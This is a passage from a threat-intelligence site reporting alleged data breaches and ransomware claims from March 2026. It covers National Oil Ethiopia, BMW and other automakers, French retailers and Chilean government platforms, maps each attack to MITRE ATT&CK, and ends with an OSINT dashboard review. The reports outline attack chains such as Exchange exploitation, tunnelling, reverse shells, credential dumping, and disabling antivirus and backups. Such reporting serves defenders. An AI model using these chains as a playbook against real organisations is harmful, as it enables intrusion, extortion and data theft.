made things faster and lighter than relying on traditional C2 infrastructure. - **Step 3: Credential Gathering**: Harvested credentials from internal systems. - **Step 4: Full AD Admin**: Achieved full Active Directory administrator access, giving complete control over the domain environment. - **Step 5: Database Access**: Accessed and exfiltrated four databases totaling over 800GB of data. The main ERP database alone contained 500GB, with the remaining data generated from application logs. - **Step 6: Veeam Compromise**: Compromised the Veeam backup infrastructure, likely to destroy or encrypt backups and prevent recovery. - **Step 7: Kaspersky Compromise**: Compromised the Kaspersky security solution, disabling or bypassing endpoint protection across the environment. - **Step 8: Ransomware**: Deployed ransomware across the infrastructure. The exfiltrated data allegedly includes client records, contracts, salaries, PII, email addresses, physical addresses, and all operational business data for both clients and employees. The actor emphasizes that the intrusion relied more on knowing where to look and when to act than on exploiting numerous vulnerabilities. Backup links and contact information via Signal, Session, Telegram, email, X, and a website are provided. The actor prefers communication via Session or Signal. ## Compromised Data Categories ERP Database (500 GB) Client Records Employee Records Contracts Salary Data Personal Identifiable Information Email Addresses Physical Addresses Operational Business Data Application Logs Active Directory Credentials Veeam Backup Infrastructure Kaspersky Security Console ## Image Preview [![Forum post by ByteToBreach detailing full infrastructure compromise of National Oil Ethiopia with 8-step attack chain, 800GB database exfiltration, and ransomware deployment](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/76915600005449435776.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/76915600005449435776.png) ## Claim URL Subscriber Access Required The original listing URL and unredacted claim images are available on the Threat Feed and Ransomware Feed for paid subscribers. [ Subscribe](https://darkwebinformer.com/pricing) Subscriber Access View the original listing URL and unredacted claim images on the feeds below. [ Threat Feed](https://darkwebinformer.com/threat-feed/) [ Ransomware Feed](https://darkwebinformer.com/ransomware-feed) ## MITRE ATT&CK Mapping [ T1190 Exploit Public-Facing Application Exploited a Microsoft Exchange ProxyLogon vulnerability to gain initial foothold into the target's infrastructure and establish a presence on the mail server. ](https://attack.mitre.org/techniques/T1190/) [ T1021 Remote Services Pivoted from the compromised Exchange server into the internal network using Ligolo tunneling and Metasploit reverse shells to move laterally across systems. ](https://attack.mitre.org/techniques/T1021/) [ T1003 OS Credential Dumping Gathered credentials from internal systems, escalating privileges until achieving full Active Directory administrator access and complete domain control. ](https://attack.mitre.org/techniques/T1003/) [ T1562.001 Impair Defenses: Disable or Modify Tools Compromised the Kaspersky security console to disable or bypass endpoint protection across the environment before deploying ransomware. ](https://attack.mitre.org/techniques/T1562/001/) [ T1490 Inhibit System Recovery Compromised the Veeam backup infrastructure to prevent disaster recovery, ensuring ransomware impact cannot be easily reversed through backup restoration. ](https://attack.mitre.org/techniques/T1490/) [ T1486 Data Encrypted for Impact Deployed ransomware across the infrastructure as the final step of the attack chain, encrypting systems after data exfiltration and backup destruction were complete. ](https://attack.mitre.org/techniques/T1486/) [ T1005 Data from Local System Exfiltrated four databases totaling 800+ GB including the main 500GB ERP database containing client records, contracts, salaries, PII, and all operational business data. ](https://attack.mitre.org/techniques/T1005/) [ T1572 Protocol Tunneling Used Ligolo as a tunneling tool running as a background process on an internal host to maintain persistent access and route traffic through the compromised network. ](https://attack.mitre.org/techniques/T1572/) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Physical Bitcoin Attacks: A Comprehensive Database of Known Physical Attacks Against Bitcoin and Crypto Asset Holders Occurring in Meatspace URL: https://darkwebinformer.com/physical-bitcoin-attacks/ Last updated: 2026-03-23T17:19:56.000Z Open-Source Threat Intelligence # Physical *Bitcoin* Attacks A comprehensive database of known physical attacks against Bitcoin and crypto asset holders occurring in meatspace. Data sourced from [gart.io](https://gart.io). This list is not exhaustive; many attacks go unreported. Stay safe. Protect your privacy. Never advertise your holdings. Incidents Per Year All Fatal Kidnapping Armed Torture Drugged Home Invasion P2P Trade Authority Misuse Stay safe. Protect your privacy. Never advertise your holdings. ### Threat Actors Claim Expanded BMW Breach With IDOR Exploit, Employee and Customer PII, and Data From Mazda, Toyota, Audi, Ford, and 32 Additional Automakers URL: https://darkwebinformer.com/threat-actors-claim-expanded-bmw-breach-with-idor-exploit-employee-and-customer-pii-and-data-from-mazda-toyota-audi-ford-and-32-additional-automakers/ Last updated: 2026-03-24T22:43:13.000Z Dark Web Informer - Cyber Threat Intelligence # Threat Actors Claim Expanded BMW Breach With IDOR Exploit, Employee and Customer PII, and Data From Mazda, Toyota, Audi, Ford, and 32 Additional Automakers March 23, 2026 - 12:43:00 AM UTC Germany (BMW HQ) Automotive Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-03-23 00:43:00 UTC Threat Actor xpl0itts Primary Victim BMW Industry Automotive Category Data Breach (Ongoing) Automakers Affected 36+ Companies Exfiltration Status Active / Ongoing Collaborators DarkRomance, teamPCP, +1 Exploit Type IDOR Network Open Web Price TBD (New Post Coming) Country Germany ## Incident Overview A threat actor going by xpl0itts has posted an update claiming their previous BMW IDOR and document breach has expanded significantly. The actor states they have partnered with other groups, and their access now extends well beyond the original scope. They claim the exfiltration is still actively ongoing, and that a new comprehensive listing will be posted once they believe they have extracted everything available. The update lists the following new data categories that have been added since the original breach: - **Kubernetes Leads**: K8s infrastructure data from BMW's environment. - **Employee and Customer PII**: Tens of thousands of records with full names, addresses, vehicle information, and VINs from customers worldwide. - **IDOR Exploit**: The original Insecure Direct Object Reference vulnerability is still for sale. - **Configuration Data**: Internal configuration files from BMW systems. - **API Data**: Newly exfiltrated API-related data. - **Subsidiary Mapping**: Nearly every subsidiary owned by BMW has been mapped. - **Additional Automakers**: New car company data now includes Mazda, Toyota, Audi, Ford, and 32 additional manufacturers. - **Multi-Brand PII**: Hundreds of other brands' PII including brand names, connections, email addresses, links, phone numbers, preferred brand data, provider information, telefax numbers, websites, city, country, address, and title fields. - **Gas Station Data**: Newly acquired gas station records. - **Order Data and Order PII**: Customer order records and associated personal information. - **VIN Lookups**: Vehicle Identification Number lookup data. The actor claims the target caught on and took their database offline, but not before the group managed to exfiltrate across 20,000 categories. They state they have data for every country's BMW group along with 26 other car companies' internal chats. The group also claims to have gained access to PetScreening but chose not to breach it, instead notifying them from a compromised ProtonMail account. The post names three collaborating groups: DarkRomance, teamPCP, and one unnamed group described as "already quite big." The actor also mentions offering initial access via file upload and IDOR vulnerabilities across other portals. The listing explicitly states that no samples are provided yet because exfiltration is still in progress and they want to compile the best data before releasing samples publicly. The subdomain mapping screenshot shows approximately 60+ unique BMW Motorrad dealer subdomains along with functional subdomains including vehicle configurator, test environments, internal environments, and user portals. ## Compromised Data Categories Employee PII Customer PII (Global) Kubernetes / K8s Data Configuration Files API Data Subsidiary Mappings Vehicle Identification Numbers (VINs) Order Data & Order PII Gas Station Records Multi-Brand PII (36+ Companies) Dealer Subdomain Infrastructure Internal Environments & Portals IDOR Exploit (For Sale) Initial Access (File Upload / IDOR) ## Image Preview [![Forum post by xpl0itts detailing expanded BMW breach with new data categories, multi-automaker access, group collaborations, and BMW Motorrad subdomain mapping](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/37570321248903232406.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/37570321248903232406.png) ## Claim URL Subscriber Access Required The original listing URL and unredacted claim images are available on the Threat Feed and Ransomware Feed for paid subscribers. [ Subscribe](https://darkwebinformer.com/pricing) Subscriber Access View the original listing URL and unredacted claim images on the feeds below. [ Threat Feed](https://darkwebinformer.com/threat-feed/) [ Ransomware Feed](https://darkwebinformer.com/ransomware-feed) ## MITRE ATT&CK Mapping [ T1190 Exploit Public-Facing Application Exploits an IDOR (Insecure Direct Object Reference) vulnerability in BMW's web infrastructure to gain unauthorized access to backend systems and data across multiple portals. ](https://attack.mitre.org/techniques/T1190/) [ T1213 Data from Information Repositories Extracts structured data across 20,000 categories from BMW's databases including customer records, employee PII, order data, VIN lookups, and subsidiary information. ](https://attack.mitre.org/techniques/T1213/) [ T1580 Cloud Infrastructure Discovery Maps Kubernetes infrastructure, enumerates 60+ dealer subdomains, and identifies internal environments, test portals, and vehicle configurator systems across BMW Motorrad. ](https://attack.mitre.org/techniques/T1580/) [ T1530 Data from Cloud Storage Accesses cloud-hosted databases and storage systems containing customer data for every country's BMW group along with 26 additional car companies' records. ](https://attack.mitre.org/techniques/T1530/) [ T1078 Valid Accounts Leverages compromised access and IDOR vulnerabilities to move laterally across BMW subsidiaries and partner systems, extending reach to 36+ automotive companies. ](https://attack.mitre.org/techniques/T1078/) [ T1567 Exfiltration Over Web Service Actively exfiltrating data through web services while advertising the breach and offering initial access via file upload and IDOR exploits to potential buyers. ](https://attack.mitre.org/techniques/T1567/) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Alleged Breach of Allopneus Exposes 453K Customers and 739K Records From France's Leading Online Tire Retailer Spanning 2014 to 2026 URL: https://darkwebinformer.com/alleged-breach-of-allopneus-exposes-453k-customers-and-739k-records-from-frances-leading-online-tire-retailer-spanning-2014-to-2026/ Last updated: 2026-03-23T15:44:20.000Z Dark Web Informer - Cyber Threat Intelligence # Alleged Breach of Allopneus Exposes 453K Customers and 739K Records From France's Leading Online Tire Retailer Spanning 2014 to 2026 March 23, 2026 - 9:40:23 AM UTC France Retail / Automotive Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-03-23 09:40:23 UTC Threat Actor HexDex Victim Allopneus Industry Retail / Automotive Category Data Breach Unique Customers 453,299 Total Records 739,316 Unique Phones 513,089 Unique Emails 453,299 Data Range 2014 - 2026 Price Make Offer Country France ## Incident Overview A threat actor going by HexDex claims to be selling customer data from Allopneus, one of France's leading online tire retailers. The company specializes in tire sales across a wide range of brands and offers vehicle maintenance services with nationwide delivery. This is HexDex's third French breach listing in recent days, following Therapeutes and Airsoft-Entrepot. The actor states the dataset covers 12 years of customer data from 2014 to 2026, with the following breakdown: - **Unique Customers**: 453,299 individual customer profiles. - **Total Records**: 739,316 records across the dataset, indicating multiple entries per customer (likely repeat purchases or service records). - **Unique Phone Numbers**: 513,089 phone numbers, which exceeds the customer count, suggesting some records include multiple contact numbers per customer. - **Unique Emails**: 453,299 email addresses matching the unique customer count. The actor provided proof links, sample lines, and a 1K line sample to demonstrate authenticity. Pricing is by offer with contact via qTox or Session. Given the nature of the business, the customer data likely includes physical addresses (for tire delivery and service appointments), vehicle information, and purchase histories in addition to the confirmed contact data. The 12-year data span is substantial and covers the period during which Allopneus grew into one of France's dominant online automotive retailers. ## Compromised Data Categories Customer Records Email Addresses Phone Numbers Personal Data Purchase / Service History (Likely) Delivery Addresses (Likely) ## Image Preview [![Forum post by HexDex selling 453K customer records from Allopneus French tire retailer with sample data and contact details](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/26818124498112337753.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/26818124498112337753.png) ## Claim URL Subscriber Access Required The original listing URL and unredacted claim images are available on the Threat Feed and Ransomware Feed for paid subscribers. [ Subscribe](https://darkwebinformer.com/pricing) Subscriber Access View the original listing URL and unredacted claim images on the feeds below. [ Threat Feed](https://darkwebinformer.com/threat-feed/) [ Ransomware Feed](https://darkwebinformer.com/ransomware-feed) ## MITRE ATT&CK Mapping [ T1190 Exploit Public-Facing Application Targets vulnerabilities in the ecommerce platform to gain unauthorized access to the customer database spanning 12 years of transactions. ](https://attack.mitre.org/techniques/T1190/) [ T1213 Data from Information Repositories Extracts structured customer records from the retailer's application database, pulling personal profiles, contact details, and transaction histories for over 453K customers. ](https://attack.mitre.org/techniques/T1213/) [ T1589.002 Gather Victim Identity: Email Addresses Harvests 453K unique email addresses and 513K phone numbers from the customer database for resale, enabling phishing and social engineering campaigns. ](https://attack.mitre.org/techniques/T1589/002/) [ T1567 Exfiltration Over Web Service Uses web forums and encrypted messaging platforms (qTox, Session) to advertise, provide samples, and negotiate sales of the stolen customer data. ](https://attack.mitre.org/techniques/T1567/) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Alleged Breach of Chile's Servicio Civil Platform Exposes 110K Public Servant Records With Full Names and User IDs URL: https://darkwebinformer.com/alleged-breach-of-chiles-servicio-civil-platform-exposes-110k-public-servant-records-with-full-names-and-user-ids/ Last updated: 2026-03-23T15:26:10.000Z Dark Web Informer - Cyber Threat Intelligence # Alleged Breach of Chile's Servicio Civil Platform Exposes 110K Public Servant Records With Full Names and User IDs March 23, 2026 - 9:11:42 AM UTC Chile Government Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-03-23 09:11:42 UTC Threat Actor NyxarGroup Victim Servicio Civil (Chile) Industry Government Category Data Leak Alleged Records 110K Price Free (Public Leak) Network Open Web Country Chile Related Actor Activity Ley del Lobby Breach ## Incident Overview A threat actor going by NyxarGroup has published 110,000 records allegedly taken from Chile's Servicio Civil campus platform, the government training portal where public servants access professional development courses and programs. Servicio Civil is Chile's National Civil Service Agency responsible for strengthening public sector workforce management and professionalization. Unlike their previous listing targeting Chile's Ley del Lobby platform (priced at $2,000), this data has been published as a free download, making it immediately accessible to anyone. The actor states the database contains: - **Fully Qualified Names**: Complete names of public servants registered on the training platform. - **User IDs**: Internal platform identifiers tied to each individual. While the data fields are limited compared to other breaches, the value lies in who is exposed. This is effectively a directory of 110,000 Chilean government employees and public servants who have accessed the civil service training system. Combined with the Ley del Lobby data from the same actor, it gives a broader picture of Chile's government workforce. The actor also hinted at future activity, stating they will soon publish data from another Chilean website. This marks NyxarGroup's second Chilean government target in the same day. ## Compromised Data Categories Full Names of Public Servants User IDs Government Employee Directory ## Image Preview [![Forum post by NyxarGroup publishing 110K records from Chile Servicio Civil government training platform with sample data and download link](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/11000988899575018352.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/11000988899575018352.png) ## Claim URL Subscriber Access Required The original listing URL and unredacted claim images are available on the Threat Feed and Ransomware Feed for paid subscribers. [ Subscribe](https://darkwebinformer.com/pricing) Subscriber Access View the original listing URL and unredacted claim images on the feeds below. [ Threat Feed](https://darkwebinformer.com/threat-feed/) [ Ransomware Feed](https://darkwebinformer.com/ransomware-feed) ## MITRE ATT&CK Mapping [ T1190 Exploit Public-Facing Application Targets vulnerabilities in the government training portal to gain unauthorized access to the user database containing public servant records. ](https://attack.mitre.org/techniques/T1190/) [ T1213 Data from Information Repositories Extracts structured user records from the Servicio Civil training platform database, pulling names and identifiers for 110,000 government employees. ](https://attack.mitre.org/techniques/T1213/) [ T1589.003 Gather Victim Identity: Employee Names Harvests fully qualified names of government employees from the civil service training system, creating a directory useful for social engineering and targeted attacks. ](https://attack.mitre.org/techniques/T1589/003/) [ T1567 Exfiltration Over Web Service Publishes the stolen database as a free download on web forums, making 110,000 public servant records immediately accessible to anyone. ](https://attack.mitre.org/techniques/T1567/) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Alleged Breach of Airsoft-Entrepot Exposes 333K Customer Records, Orders, Invoices, and B2B Data From French Retailer Spanning 2013 to 2026 URL: https://darkwebinformer.com/alleged-breach-of-airsoft-entrepot-exposes-333k-customer-records-orders-invoices-and-b2b-data-from-french-retailer-spanning-2013-to-2026/ Last updated: 2026-03-23T15:08:35.000Z Dark Web Informer - Cyber Threat Intelligence # Alleged Breach of Airsoft-Entrepot Exposes 333K Customer Records, Orders, Invoices, and B2B Data From French Retailer Spanning 2013 to 2026 March 23, 2026 - 4:03:43 AM UTC France Retail / E-Commerce Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-03-23 04:03:43 UTC Threat Actor HexDex Victim Airsoft-Entrepot Industry Retail / E-Commerce Category Data Breach Unique Customers 383K Unique Emails 328K Unique Phones 243K Data Range 2013 - 2026 Files 10+ Price Make Offer Country France ## Incident Overview A threat actor going by HexDex claims to be selling multiple databases from Airsoft-Entrepot, a French online retailer specializing in airsoft equipment, replicas, gear, and accessories. The company is known for competitive pricing, fast shipping, and a strong presence in the airsoft community. The listing covers data spanning from 2013 to 2026 across more than 10 separate database files. The actor is offering customer, order, invoice, supplier, delivery, accounting, and B2B order databases along with warehouse and inventory data. From the customer file alone, the actor provided the following breakdown: - **Unique Addresses**: 333K full address records. - **Unique Customers**: 383K individual customer profiles. - **Unique Phone Numbers**: 243K phone numbers. - **Unique Emails**: 328K email addresses. The breadth of the data goes well beyond just customer PII. The inclusion of supplier databases, B2B order records, accounting data, and warehouse inventory means this breach exposes the company's full operational backend: who they buy from, what they sell, what they stock, their financial records, and their entire customer and delivery history over 13 years. The actor provided proof links, sample data from the customer file, and a 1K line sample across all files. Pricing is by offer, with contact available via qTox or Session messaging. ## Compromised Data Categories Customer Records Full Addresses Email Addresses Phone Numbers Order History Invoice Data Supplier Information Delivery Records Accounting Data B2B Order Records Warehouse / Inventory Data ## Image Preview [![Forum post by HexDex selling Airsoft-Entrepot customer, order, invoice, supplier, and B2B databases with sample data and record counts](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/82236094339955459327.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/82236094339955459327.png) [![Additional database file details and 1K line sample from Airsoft-Entrepot breach listing with pricing and contact information](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/82236094339955459328.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/82236094339955459328.png) ## Claim URL Subscriber Access Required The original listing URL and unredacted claim images are available on the Threat Feed and Ransomware Feed for paid subscribers. [ Subscribe](https://darkwebinformer.com/pricing) Subscriber Access View the original listing URL and unredacted claim images on the feeds below. [ Threat Feed](https://darkwebinformer.com/threat-feed/) [ Ransomware Feed](https://darkwebinformer.com/ransomware-feed) ## MITRE ATT&CK Mapping [ T1190 Exploit Public-Facing Application Targets vulnerabilities in the retailer's ecommerce platform to gain unauthorized access to backend databases containing customer, order, and business data. ](https://attack.mitre.org/techniques/T1190/) [ T1213 Data from Information Repositories Extracts structured data from ecommerce application databases, pulling customer profiles, order histories, invoices, supplier records, and accounting data across 10+ files. ](https://attack.mitre.org/techniques/T1213/) [ T1005 Data from Local System Collects data directly from the compromised system, extracting full database exports including warehouse inventory, delivery records, and B2B transaction history. ](https://attack.mitre.org/techniques/T1005/) [ T1589.002 Gather Victim Identity: Email Addresses Harvests 328K unique email addresses, 243K phone numbers, and 333K physical addresses from the customer database for resale and potential targeted attacks. ](https://attack.mitre.org/techniques/T1589/002/) [ T1530 Data from Cloud Storage Accesses cloud-hosted ecommerce databases and storage systems containing 13 years of operational data including supplier relationships and financial records. ](https://attack.mitre.org/techniques/T1530/) [ T1567 Exfiltration Over Web Service Uses web forums and encrypted messaging (qTox, Session) to advertise, distribute samples, and negotiate sales of the stolen retail databases. ](https://attack.mitre.org/techniques/T1567/) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Alleged Breach of Chile's Ley del Lobby Platform Exposes 250GB of Government Lobbying Records Spanning 2018 to 2026 URL: https://darkwebinformer.com/alleged-breach-of-chiles-ley-del-lobby-platform-exposes-250gb-of-government-lobbying-records-spanning-2018-to-2026/ Last updated: 2026-03-23T14:47:35.000Z Dark Web Informer - Cyber Threat Intelligence # Alleged Breach of Chile's Ley del Lobby Platform Exposes 250GB of Government Lobbying Records Spanning 2018 to 2026 March 23, 2026 - 1:58:18 AM UTC Chile Government Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-03-23 01:58:18 UTC Threat Actor NyxarGroup Victim Ley del Lobby (Chile) Industry Government Category Data Breach Data Size 250 GB (3 GB Compressed) Data Range 2018 - 2026 Price $2,000 Network Open Web Country Chile ## Incident Overview A threat actor going by NyxarGroup claims to be selling 250GB of data from Chile's Ley del Lobby platform, the government transparency portal that records and monitors lobbying activities carried out by individuals, companies, and organizations in relation to public decisions. The platform is designed to make transparent the influences that interest groups exert on legislative and administrative processes throughout the country. The dataset allegedly spans from 2018 to 2026 and contains detailed records of lobbying hearings with the following fields: - **Hearing Records**: Hearing record identifiers, folio numbers, dates of receipt, and recipients of applications. - **Institutional Data**: Institution names, positions held, official titles, and individualization of applicants. - **Personal Identifiers**: Full names, RUT numbers (Chile's national identification), passport numbers, and issuing country. - **Contact Information**: Means of contact, quality designations, and names of represented parties. - **Meeting Details**: Specific matters to be addressed, specifications of matters, attendees at each hearing, additional information, details of the meeting itself, modality (in-person or virtual), place, commune, date, and time. The actor notes that the sample data includes hearings scheduled for the coming month, as well as meetings involving senior government and military officials including General Officers, Directors of Intelligence, Chiefs of Development Divisions, Directors of Public Safety, Directors of Naval Systems Engineering, and Chiefs of Field Telecommunications of the Logistics Command. The compressed file is 3GB and the uncompressed dataset is 253GB. The listing is priced at $2,000 with contact via PM or SimpleX messaging. ## Compromised Data Categories Lobbying Hearing Records RUT / National ID Numbers Passport Numbers Full Names Government Official Positions Institutional Affiliations Contact Information Meeting Schedules & Locations Military Officer Details Represented Party Names Matters Addressed in Hearings ## Image Preview [![Forum post by NyxarGroup selling 250GB of data from Chile Ley del Lobby government transparency platform with record structure and pricing](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/21587847116991292926.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/21587847116991292926.png) ## Claim URL Subscriber Access Required The original listing URL and unredacted claim images are available on the Threat Feed and Ransomware Feed for paid subscribers. [ Subscribe](https://darkwebinformer.com/pricing) Subscriber Access View the original listing URL and unredacted claim images on the feeds below. [ Threat Feed](https://darkwebinformer.com/threat-feed/) [ Ransomware Feed](https://darkwebinformer.com/ransomware-feed) ## MITRE ATT&CK Mapping [ T1190 Exploit Public-Facing Application Targets vulnerabilities in government web applications to gain unauthorized access to backend databases containing lobbying and transparency records. ](https://attack.mitre.org/techniques/T1190/) [ T1213 Data from Information Repositories Extracts structured records from the government transparency database, pulling hearing records, applicant details, official positions, and meeting schedules spanning 8 years. ](https://attack.mitre.org/techniques/T1213/) [ T1005 Data from Local System Collects data directly from compromised government systems, extracting 250GB of lobbying records including national identification numbers and classified meeting details. ](https://attack.mitre.org/techniques/T1005/) [ T1560 Archive Collected Data Compresses 253GB of stolen data down to a 3GB archive for efficient distribution, reducing the original dataset by roughly 98%. ](https://attack.mitre.org/techniques/T1560/) [ T1589.001 Gather Victim Identity: Credentials Harvests national identification numbers (RUT), passport numbers, and personal details of government officials, lobbyists, and military personnel for resale. ](https://attack.mitre.org/techniques/T1589/001/) [ T1567 Exfiltration Over Web Service Uses web forums and SimpleX messaging to advertise and sell the stolen government database, with samples provided to verify data authenticity. ](https://attack.mitre.org/techniques/T1567/) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### World Monitor: A Free, Open-Source Global Intelligence Dashboard with 25 Data Layers and AI-Powered Threat Classification URL: https://darkwebinformer.com/world-monitor-a-free-open-source-global-intelligence-dashboard-with-25-data-layers-and-ai-powered-threat-classification/ Last updated: 2026-03-19T19:19:14.000Z Tool Spotlight OSINT Open Source Mar 19, 2026 # World Monitor: A Free, Open-Source Global Intelligence Dashboard with 25 Data Layers and AI-Powered Threat Classification A real-time situational awareness platform that aggregates 100+ news feeds, military flight tracking, naval vessel monitoring, satellite fire detection, conflict zone mapping, and infrastructure data into a single interactive map with AI-synthesized intelligence briefs. Think Palantir, but open source and free. koala73 / worldmonitor Real-time global intelligence dashboard — AI-powered news aggregation, geopolitical monitoring, and infrastructure tracking in a unified situational awareness interface TypeScript 80.5% JavaScript 10.2% CSS 9.1% ★ 41.1k stars MIT 6.7k forks 2,415 commits 74 contributors OSINT tools that provide real-time geopolitical situational awareness have traditionally been either expensive commercial products or cobbled-together collections of individual data sources. **World Monitor**, by Elie Habib, is an open-source attempt to build a unified intelligence dashboard that aggregates military tracking, conflict monitoring, infrastructure mapping, news correlation, and AI-powered analysis into a single browser-based interface — and it's free. With 41.1k stars, it's one of the fastest-growing OSINT projects on GitHub. The tool runs entirely in the browser with Vercel Edge Functions as a lightweight API layer, meaning there's no heavy backend to deploy. Two live variants are available: a geopolitical/military-focused version at worldmonitor.app and a tech-industry variant at tech.worldmonitor.app. ## // The 25 Data Layers ⚔️ Geopolitical Active conflict zones with escalation tracking, intelligence hotspots, social unrest events (ACLED + GDELT), sanctions regimes, weather alerts. 🎖️ Military & Strategic 220+ military bases, live flight tracking (ADS-B), naval vessel monitoring (AIS), nuclear facilities, APT cyber threat attribution, spaceports. 🏗️ Infrastructure Undersea cables, oil/gas pipelines, 111 AI datacenter clusters, internet outages (Cloudflare Radar), critical mineral deposits, NASA FIRMS satellite fire detection. 📰 News & Video 100+ RSS feeds with source tiering and propaganda flagging, live video streams (Bloomberg, Sky News, Al Jazeera), entity extraction, custom keyword monitors. ## // AI Intelligence Pipeline News item arrives → Keyword classifier (instant) → LLM classifier (async) → Geo-locate via 74-hub database → Correlate with signals → Map + Alert Every news item passes through a two-stage threat classification pipeline. A keyword classifier matches against \~120 threat keywords organized by severity and returns instantly. A Groq Llama 3.1 8B LLM classifier fires asynchronously and overrides the keyword result only if its confidence is higher. Results are cached in Redis (24h TTL) keyed by headline hash, so subsequent users see pre-classified results. The UI is never blocked waiting for AI. Beyond classification, the system runs several analytical modules: a **Country Instability Index** (CII) that computes real-time stability scores for 20 monitored nations, **Focal Point Detection** that correlates entities across news/military/protests/markets to identify convergence, and a **Strategic Posture Assessment** that combines all intelligence modules into a composite risk score with trend detection. ## // Anomaly Detection & Signal Fusion 📊 Temporal Baseline Anomaly Detection Rather than static thresholds, the system learns what "normal" looks like using Welford's online algorithm for streaming mean/variance computation per event type, region, weekday, and month over a 90-day window. Z-scores of 1.5/2.0/3.0 flag deviations like "Military flights 3.2x normal for Thursday (January)." A minimum of 10 historical samples is required before reporting anomalies. The signal aggregation system fuses data from military flights, naval vessels, protests, satellite fires, AIS disruptions, internet outages, and news velocity into a unified geospatial picture. Events are binned into 1°×1° geographic cells, and when 3+ distinct event types converge in one cell within 24 hours, a convergence alert fires. This multi-signal approach means no single data source is trusted alone — escalation requires corroboration across independent channels. ## // Architecture | Component | Technology | | ------------ | ------------------------------------------------------------------------------------------ | | Frontend | TypeScript, Vite, deck.gl (WebGL), MapLibre GL | | AI/ML | Groq (Llama 3.1 8B), TensorFlow.js (T5 fallback in-browser) | | Caching | Redis (Upstash) for cross-user AI deduplication | | API Layer | 30+ Vercel Edge Functions (RSS proxy, data adapters, scrapers) | | Data Sources | OpenSky, GDELT, ACLED, USGS, NASA FIRMS, FRED, Polymarket, Cloudflare Radar, AIS, 100+ RSS | | Deployment | Vercel (hosted), self-hosted Docker on roadmap | A key architectural choice is **browser-first compute**: analysis like clustering, instability scoring, surge detection, and convergence detection all run client-side. The Vercel Edge Functions serve primarily as CORS proxies, caching layers, and API key gatekeepers. This means the dashboard works with minimal backend dependency — a browser-side T5 model via TensorFlow.js even provides AI fallback when cloud endpoints are unavailable. ## // Source Credibility Every RSS feed is assigned a source tier (Tier 1: wire services like Reuters/AP; Tier 2: major outlets like CNN/NYT; Tier 3: specialized defense publications; Tier 4: aggregators/blogs) plus a propaganda risk rating and state affiliation flag. State-affiliated sources (RT, Xinhua, IRNA) are included for completeness but visually tagged. Threat classification confidence is weighted by source tier — a Tier 1 breaking alert carries more weight than a Tier 4 blog post in the focal point algorithm. ## // Considerations 